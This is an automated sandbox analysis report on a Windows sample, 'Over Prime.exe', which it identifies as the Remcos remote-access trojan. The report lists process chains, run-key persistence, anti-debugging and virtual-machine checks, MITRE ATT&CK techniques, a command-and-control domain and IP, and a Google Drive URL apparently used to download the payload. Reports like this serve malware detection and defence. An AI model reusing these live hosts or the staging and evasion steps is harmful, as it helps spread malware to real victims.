Jump to behavior

Source: C:\Users\user\Desktop\Over Prime.exe	Code function: 0_2_00405C49 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_00405C49
Source: C:\Users\user\Desktop\Over Prime.exe	Code function: 0_2_00406873 FindFirstFileW,FindClose,	0_2_00406873
Source: C:\Users\user\Desktop\Over Prime.exe	Code function: 0_2_0040290B FindFirstFileW,	0_2_0040290B
Source: C:\Users\user\AppData\Roaming\wqs.exe	Code function: 11_2_00405C49 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	11_2_00405C49
Source: C:\Users\user\AppData\Roaming\wqs.exe	Code function: 11_2_00406873 FindFirstFileW,FindClose,	11_2_00406873
Source: C:\Users\user\AppData\Roaming\wqs.exe	Code function: 11_2_0040290B FindFirstFileW,	11_2_0040290B
Source: C:\Users\user\AppData\Roaming\wqs.exe	Code function: 20_2_00405C49 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	20_2_00405C49
Source: C:\Users\user\AppData\Roaming\wqs.exe	Code function: 20_2_00406873 FindFirstFileW,FindClose,	20_2_00406873
Source: C:\Users\user\AppData\Roaming\wqs.exe	Code function: 20_2_0040290B FindFirstFileW,	20_2_0040290B

Source: C:\Users\user\Desktop\Over Prime.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\Over Prime.exe	API call chain: ExitProcess graph end node	graph_0-27867
Source: C:\Users\user\Desktop\Over Prime.exe	API call chain: ExitProcess graph end node	graph_0-27863
Source: C:\Users\user\AppData\Roaming\wqs.exe	API call chain: ExitProcess graph end node	graph_11-4360
Source: C:\Users\user\AppData\Roaming\wqs.exe	API call chain: ExitProcess graph end node	graph_11-4514
Source: C:\Users\user\AppData\Roaming\wqs.exe	API call chain: ExitProcess graph end node	graph_20-3352
Source: C:\Users\user\AppData\Roaming\wqs.exe	API call chain: ExitProcess graph end node	graph_20-3505

Source: Over Prime.exe, 00000000.00000002.979494953.0000000004D39000.00000004.00000800.00020000.00000000.sdmp, wqs.exe, 00000014.00000002.1501048263.0000000004809000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Guest Shutdown Service
Source: Over Prime.exe, 00000000.00000002.979494953.0000000004D39000.00000004.00000800.00020000.00000000.sdmp, wqs.exe, 00000014.00000002.1501048263.0000000004809000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Remote Desktop Virtualization Service
Source: wqs.exe, 00000014.00000002.1501048263.0000000004809000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmicshutdown
Source: Over Prime.exe, 00000000.00000002.979494953.0000000004D39000.00000004.00000800.00020000.00000000.sdmp, wqs.exe, 00000014.00000002.1501048263.0000000004809000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Volume Shadow Copy Requestor
Source: Over Prime.exe, 00000003.00000002.978427777.0000000003311000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ntdlluser32kernel32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=https://drive.google.com/uc?export=download&id=1rTDvne0SIi78eB9wV1iwwAGXz7RS5mjx
Source: wqs.exe, 00000021.00000002.5715266843.0000000001883000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWP
Source: Over Prime.exe, 00000000.00000002.979494953.0000000004D39000.00000004.00000800.00020000.00000000.sdmp, wqs.exe, 00000014.00000002.1501048263.0000000004809000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V PowerShell Direct Service
Source: Over Prime.exe, 00000000.00000002.979494953.0000000004D39000.00000004.00000800.00020000.00000000.sdmp, wqs.exe, 00000014.00000002.1501048263.0000000004809000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Time Synchronization Service
Source: wqs.exe, 00000014.00000002.1501048263.0000000004809000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmicvss
Source: Over Prime.exe, 00000003.00000002.976868557.0000000001868000.00000004.00000020.00020000.00000000.sdmp, Over Prime.exe, 00000003.00000002.977479110.00000000018CB000.00000004.00000020.00020000.00000000.sdmp, wqs.exe, 00000021.00000002.5716534345.00000000018FA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.14.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Over Prime.exe, 00000000.00000002.979153993.0000000002D31000.00000004.00000800.00020000.00000000.sdmp, Over Prime.exe, 00000003.00000002.978427777.0000000003311000.00000004.00000800.00020000.00000000.sdmp, wqs.exe, 00000014.00000002.1500676497.0000000002E31000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: Over Prime.exe, 00000000.00000002.979494953.0000000004D39000.00000004.00000800.00020000.00000000.sdmp, wqs.exe, 00000014.00000002.1501048263.0000000004809000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Data Exchange Service
Source: Over Prime.exe, 00000000.00000002.979494953.0000000004D39000.00000004.00000800.00020000.00000000.sdmp, wqs.exe, 00000014.00000002.1501048263.0000000004809000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Heartbeat Service
Source: Over Prime.exe, 00000000.00000002.979494953.0000000004D39000.00000004.00000800.00020000.00000000.sdmp, wqs.exe, 00000014.00000002.1501048263.0000000004809000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Guest Service Interface
Source: wqs.exe, 00000014.00000002.1501048263.0000000004809000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmicheartbeat
Source: Over Prime.exe, 00000000.00000002.979153993.0000000002D31000.00000004.00000800.00020000.00000000.sdmp, wqs.exe, 00000014.00000002.1500676497.0000000002E31000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ntdlluser32kernel32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=windir=\syswow64\mshtml.dll

Source: C:\Users\user\Desktop\Over Prime.exe

Code function: 0_2_73B91BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,

0_2_73B91BFF

Source: C:\Users\user\Desktop\Over Prime.exe

Code function: 0_2_02C30AF1 rdtsc

0_2_02C30AF1

Source: C:\Users\user\Desktop\Over Prime.exe	Code function: 0_2_02C40357 mov eax, dword ptr fs:[00000030h]	0_2_02C40357
Source: C:\Users\user\Desktop\Over Prime.exe	Code function: 0_2_02C45323 mov eax, dword ptr fs:[00000030h]	0_2_02C45323
Source: C:\Users\user\Desktop\Over Prime.exe	Code function: 0_2_02C43CD7 mov eax, dword ptr fs:[00000030h]	0_2_02C43CD7
Source: C:\Users\user\Desktop\Over Prime.exe	Code function: 0_2_02C43469 mov eax, dword ptr fs:[00000030h]	0_2_02C43469
Source: C:\Users\user\Desktop\Over Prime.exe	Code function: 3_2_0166E1FA mov eax, dword ptr fs:[00000030h]	3_2_0166E1FA
Source: C:\Users\user\Desktop\Over Prime.exe	Code function: 3_2_016731C6 mov eax, dword ptr fs:[00000030h]	3_2_016731C6
Source: C:\Users\user\Desktop\Over Prime.exe	Code function: 3_2_01671B7A mov eax, dword ptr fs:[00000030h]	3_2_01671B7A
Source: C:\Users\user\Desktop\Over Prime.exe	Code function: 3_2_0167130C mov eax, dword ptr fs:[00000030h]	3_2_0167130C

Source: C:\Users\user\Desktop\Over Prime.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\Over Prime.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wqs.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wqs.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wqs.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\Desktop\Over Prime.exe	Process created: C:\Users\user\Desktop\Over Prime.exe "C:\Users\user\Desktop\Over Prime.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Over Prime.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\install.vbs"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Roaming\wqs.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Roaming\wqs.exe C:\Users\user\AppData\Roaming\wqs.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wqs.exe	Process created: C:\Users\user\AppData\Roaming\wqs.exe "C:\Users\user\AppData\Roaming\wqs.exe"	Jump to behavior

Source: wqs.exe, 00000021.00000002.5715734688.00000000018B2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager5O10D\l
Source: wqs.exe, 00000021.00000002.5716810220.0000000001910000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: wqs.exe, 00000021.00000002.5715734688.00000000018B2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager"
Source: wqs.exe, 00000021.00000002.5715734688.00000000018B2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager5O10D\c
Source: wqs.exe, 00000021.00000002.5715734688.00000000018B2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager5O10D\H
Source: wqs.exe, 00000021.00000002.5716810220.0000000001910000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Managerr2Js
Source: wqs.exe, 00000021.00000002.5715734688.00000000018B2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Managerr\|
Source: wqs.exe, 00000021.00000002.5715734688.00000000018B2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager5O10D\Z
Source: wqs.exe, 00000021.00000002.5716810220.0000000001910000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Managera2[s
Source: wqs.exe, 00000021.00000002.5715734688.00000000018B2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManagerQ
Source: wqs.exe, 00000021.00000002.5715734688.00000000018B2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager5O10D\~
Source: wqs.exe, 00000021.00000002.5716810220.0000000001910000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Managerx2\|s
Source: wqs.exe, 00000021.00000002.5715734688.00000000018B2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager5O10D\4
Source: wqs.exe, 00000021.00000002.5716810220.0000000001910000.00000004.00000020.00020000.00000000.sdmp, wqs.exe, 00000021.00000002.5715734688.00000000018B2000.00000004.00000020.00020000.00000000.sdmp, wqs.exe, 00000021.00000002.5716696567.000000000190A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \|Program Manager\|
Source: wqs.exe, 00000021.00000002.5715734688.00000000018B2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager5O10D\
Source: wqs.exe, 00000021.00000002.5716810220.0000000001910000.00000004.00000020.00020000.00000000.sdmp, wqs.exe, 00000021.00000002.5714798274.0000000001858000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [Program Manager]

Source: C:\Windows\SysWOW64\cmd.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Windows\SysWOW64\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\Desktop\Over Prime.exe

Code function: 0_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

0_2_0040352D

Source: Amcache.hve.14.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.14.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.14.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.2107.4-0\msmpeng.exe
Source: Amcache.hve.14.dr	Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Yara detected Remcos RAT

Source: Yara match	File source: 00000021.00000002.5715734688.00000000018B2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.977479110.00000000018CB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Over Prime.exe PID: 396, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: wqs.exe PID: 2540, type: MEMORYSTR

Remote Access Functionality

Yara detected Remcos RAT

Source: Yara match	File source: 00000021.00000002.5715734688.00000000018B2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.977479110.00000000018CB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Over Prime.exe PID: 396, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: wqs.exe PID: 2540, type: MEMORYSTR

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	11 Scripting	1 DLL Side-Loading	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	11 Input Capture	2 File and Directory Discovery	Remote Services	1 Archive Collected Data	Exfiltration Over Other Network Medium	3 Ingress Tool Transfer	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	1 System Shutdown/Reboot
Default Accounts	1 Native API	1 Registry Run Keys / Startup Folder	1 Access Token Manipulation	11 Scripting	LSASS Memory	15 System Information Discovery	Remote Desktop Protocol	11 Input Capture	Exfiltration Over Bluetooth	11 Encrypted Channel	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	12 Process Injection	2 Obfuscated Files or Information	Security Account Manager	1 Query Registry	SMB/Windows Admin Shares	1 Clipboard Data	Automated Exfiltration	1 Non-Standard Port	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	1 Registry Run Keys / Startup Folder	1 DLL Side-Loading	NTDS	331 Security Software Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	3 Non-Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	1 Masquerading	LSA Secrets	12 Virtualization/Sandbox Evasion	SSH	Keylogging	Data Transfer Size Limits	114 Application Layer Protocol	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	12 Virtualization/Sandbox Evasion	Cached Domain Credentials	1 Process Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	1 Access Token Manipulation	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	12 Process Injection	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
Over Prime.exe	12%	Virustotal		Browse
Over Prime.exe	12%	ReversingLabs	Win32.Trojan.Shelsy

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\install.vbs	100%	Avira	VBS/Runner.VPD
C:\Users\user\AppData\Local\Temp\fossildelta.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\nse70B.tmp\System.dll	3%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\nse70B.tmp\System.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\nsf8786.tmp\System.dll	3%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\nsf8786.tmp\System.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\nstC2CA.tmp\System.dll	3%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\nstC2CA.tmp\System.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\wqs.exe	12%	ReversingLabs	Win32.Trojan.Shelsy

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
dual-a-0001.a-msedge.net	1%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
entralent200.sytes.net	0%	Avira URL Cloud	safe
http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd	0%	Virustotal		Browse
http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd	0%	Avira URL Cloud	safe
https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214	0%	Avira URL Cloud	safe
http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.	0%	Avira URL Cloud	safe
http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd	0%	Avira URL Cloud	safe
http://www.gopher.ftp://ftp.	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
entralent200.sytes.net	185.20.186.25	true	true		unknown
dual-a-0001.a-msedge.net	204.79.197.200	true	false	1%, Virustotal, Browse	unknown
drive.google.com	142.250.186.110	true	false		high
googlehosted.l.googleusercontent.com	142.250.185.65	true	false		high
doc-0g-2k-docs.googleusercontent.com	unknown	unknown	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
entralent200.sytes.net	true	Avira URL Cloud: safe	unknown
https://doc-0g-2k-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/3efh5oi21jf0folm3d9lt695jp6ibgqc/1653914700000/00364753337067030959/*/1rTDvne0SIi78eB9wV1iwwAGXz7RS5mjx?e=download	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd	Over Prime.exe, 00000003.00000001.829854914.00000000005F2000.00000008.00000001.01000000.00000006.sdmp, wqs.exe, 00000021.00000001.1315487546.00000000005F2000.00000020.00000001.01000000.00000006.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://doc-0g-2k-docs.googleusercontent.com/	Over Prime.exe, 00000003.00000003.967952914.00000000018DD000.00000004.00000020.00020000.00000000.sdmp, Over Prime.exe, 00000003.00000002.977256997.00000000018A9000.00000004.00000020.00020000.00000000.sdmp, wqs.exe, 00000021.00000002.5716810220.0000000001910000.00000004.00000020.00020000.00000000.sdmp, wqs.exe, 00000021.00000002.5715734688.00000000018B2000.00000004.00000020.00020000.00000000.sdmp, wqs.exe, 00000021.00000003.1474693072.0000000001910000.00000004.00000020.00020000.00000000.sdmp, wqs.exe, 00000021.00000003.1464487636.0000000001910000.00000004.00000020.00020000.00000000.sdmp	false		high
https://drive.google.com/	wqs.exe, 00000021.00000002.5715734688.00000000018B2000.00000004.00000020.00020000.00000000.sdmp	false		high
https://drive.google.com/ertificates	wqs.exe, 00000021.00000002.5715734688.00000000018B2000.00000004.00000020.00020000.00000000.sdmp	false		high
https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214	Over Prime.exe, 00000003.00000001.830296323.0000000000649000.00000008.00000001.01000000.00000006.sdmp, wqs.exe, 00000021.00000001.1315961931.0000000000649000.00000020.00000001.01000000.00000006.sdmp	false	Avira URL Cloud: safe	unknown
https://doc-0g-2k-docs.googleusercontent.com/%%doc-0g-2k-docs.googleusercontent.com	Over Prime.exe, 00000003.00000003.968299753.0000000001925000.00000004.00000020.00020000.00000000.sdmp, Over Prime.exe, 00000003.00000002.977966120.0000000001925000.00000004.00000020.00020000.00000000.sdmp	false		high
http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.	Over Prime.exe, 00000003.00000001.830296323.0000000000649000.00000008.00000001.01000000.00000006.sdmp, wqs.exe, 00000021.00000001.1315961931.0000000000649000.00000020.00000001.01000000.00000006.sdmp	false	Avira URL Cloud: safe	unknown
http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd	Over Prime.exe, 00000003.00000001.829854914.00000000005F2000.00000008.00000001.01000000.00000006.sdmp, wqs.exe, 00000021.00000001.1315487546.00000000005F2000.00000020.00000001.01000000.00000006.sdmp	false	Avira URL Cloud: safe	unknown
http://upx.sf.net	Amcache.hve.14.dr	false		high
http://nsis.sf.net/NSIS_ErrorError	Over Prime.exe, wqs.exe.3.dr	false		high
http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTD	Over Prime.exe, 00000003.00000001.830139550.0000000000626000.00000008.00000001.01000000.00000006.sdmp, wqs.exe, 00000021.00000001.1315762742.0000000000626000.00000020.00000001.01000000.00000006.sdmp	false		high
http://www.gopher.ftp://ftp.	Over Prime.exe, 00000003.00000001.830296323.0000000000649000.00000008.00000001.01000000.00000006.sdmp, wqs.exe, 00000021.00000001.1315961931.0000000000649000.00000020.00000001.01000000.00000006.sdmp	false	Avira URL Cloud: safe	unknown
https://doc-0g-2k-docs.googleusercontent.com/$	Over Prime.exe, 00000003.00000002.977256997.00000000018A9000.00000004.00000020.00020000.00000000.sdmp	false		high
https://doc-0g-2k-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/3efh5oi2	wqs.exe, 00000021.00000003.1464487636.0000000001910000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
142.250.186.110	drive.google.com	United States	15169	GOOGLEUS	false
185.20.186.25	entralent200.sytes.net	Ukraine	42159	DELTAHOST-ASUA	true
142.250.185.65	googlehosted.l.googleusercontent.com	United States	15169	GOOGLEUS	false

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	636171
Start date and time: 30/05/202214:42:21	2022-05-30 14:42:21 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 14m 38s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	Over Prime.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
Run name:	Suspected Instruction Hammering
Number of analysed new started processes analysed:	42
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@14/16@3/3
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 25.6% (good quality ratio 25.2%) Quality average: 86.4% Quality standard deviation: 21.8%
HCA Information:	Successful, ratio: 96% Number of executed functions: 158 Number of non-executed functions: 159
Cookbook Comments:	Found application associated with file extension: .exe Adjust boot time Enable AMSI

Warnings

Exclude process from analysis (whitelisted): taskhostw.exe, MusNotification.exe, dllhost.exe, RuntimeBroker.exe, SIHClient.exe, backgroundTaskHost.exe, MoUsoCoreWorker.exe, rundll32.exe, BackgroundTransferHost.exe, WerFault.exe, WMIADAP.exe, SgrmBroker.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 40.117.96.136, 13.107.5.88, 20.54.122.82, 20.189.173.22
Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, onedsblobprdwus17.westus.cloudapp.azure.com, e-0009.e-msedge.net, arc.msn.com, login.live.com, img-prod-cms-rt-microsoft-com.akamaized.net, www.bing.com, evoke-windowsservices-tas-msedge-net.e-0009.e-msedge.net, client.wns.windows.com, fs.microsoft.com, tile-service.weather.microsoft.com, ctldl.windowsupdate.com, settings-win.data.microsoft.com, wd-prod-cp.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, ris.api.iris.microsoft.com, wd-prod-cp-eu-north-1-fe.northeurope.cloudapp.azure.com, wdcpalt.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, apimgmttmr17ij3jt5dneg64srod9jevcuajxaoube4brtu9cq.trafficmanager.net, evoke-windowsservices-tas.msedge.net, blobcollector.events.data.trafficmanager.net, apimgmthszbjimgeglorvthkncixvpso9vnynvh3ehmsdll33a.cloudapp.net, umwatson.events.data.microsoft.com, nexusrules.officeapps.live.com, manage.devcenter.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
14:45:09	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run ws "C:\Users\user\AppData\Roaming\wqs.exe"
14:45:15	API Interceptor	1x Sleep call for process: WerFault.exe modified
14:45:17	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run ws "C:\Users\user\AppData\Roaming\wqs.exe"
14:45:57	API Interceptor	1x Sleep call for process: wqs.exe modified

Joe Sandbox View / Context

IPs

⊘No context

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
dual-a-0001.a-msedge.net	56516426-056B-4BDA-984C-979F68AB8D18 pdf.exe	Get hash	malicious	Browse	204.79.197.200
	Company Profile.exe	Get hash	malicious	Browse	204.79.197.200
	Enquire_260522_pdf.exe	Get hash	malicious	Browse	13.107.21.200
	order samples attached.exe	Get hash	malicious	Browse	204.79.197.200
	https://1drv.ms/b/s!Atb1NmLkxNTObzQ4wL_Jg0veVSc	Get hash	malicious	Browse	204.79.197.200
	Yleo222Kem.exe	Get hash	malicious	Browse	204.79.197.200
	svsEu9tebl.exe	Get hash	malicious	Browse	204.79.197.200
	SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exe	Get hash	malicious	Browse	13.107.21.200
	https://triarail-mx.w3spaces.com/	Get hash	malicious	Browse	204.79.197.200
	odeme.exe	Get hash	malicious	Browse	204.79.197.200
	https://na3.docusign.net/Member/EmailStart.aspx?a=e48f9a7e-7630-4f4a-9e73-9ae4c68238d0&acct=6d128e02-3d7d-42e7-b7c2-14e521db149f&er=ca6b7a2d-cdb3-4ab1-8f2e-072215336210	Get hash	malicious	Browse	204.79.197.200
	xls.exe	Get hash	malicious	Browse	204.79.197.200
	SecuriteInfo.com.W32.AIDetectNet.01.28145.exe	Get hash	malicious	Browse	204.79.197.200
	https://auto-review.w3spaces.com/	Get hash	malicious	Browse	13.107.21.200
	https://auto-review.w3spaces.com/	Get hash	malicious	Browse	13.107.21.200
	http://australianmorningnews.com/	Get hash	malicious	Browse	204.79.197.200
	https://heylink.me/gshdj/	Get hash	malicious	Browse	13.107.21.200
	https://auto-review.w3spaces.com/	Get hash	malicious	Browse	204.79.197.200
	pago.exe	Get hash	malicious	Browse	204.79.197.200
	SecuriteInfo.com.W32.AIDetect.malware2.8825.exe	Get hash	malicious	Browse	13.107.21.200

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
DELTAHOST-ASUA	SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe	Get hash	malicious	Browse	185.20.186.103
	SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.29800.exe	Get hash	malicious	Browse	185.161.208.42
	http://dlitster.login-microonlinesoftauthportal.info/dlitster@dcurealty.com	Get hash	malicious	Browse	185.161.211.13
	SD 2477.exe	Get hash	malicious	Browse	185.20.186.103
	SecuriteInfo.com.Variant.Zusy.423667.18777.exe	Get hash	malicious	Browse	185.161.209.247
	Compliance_2022.lnk	Get hash	malicious	Browse	185.236.76.230
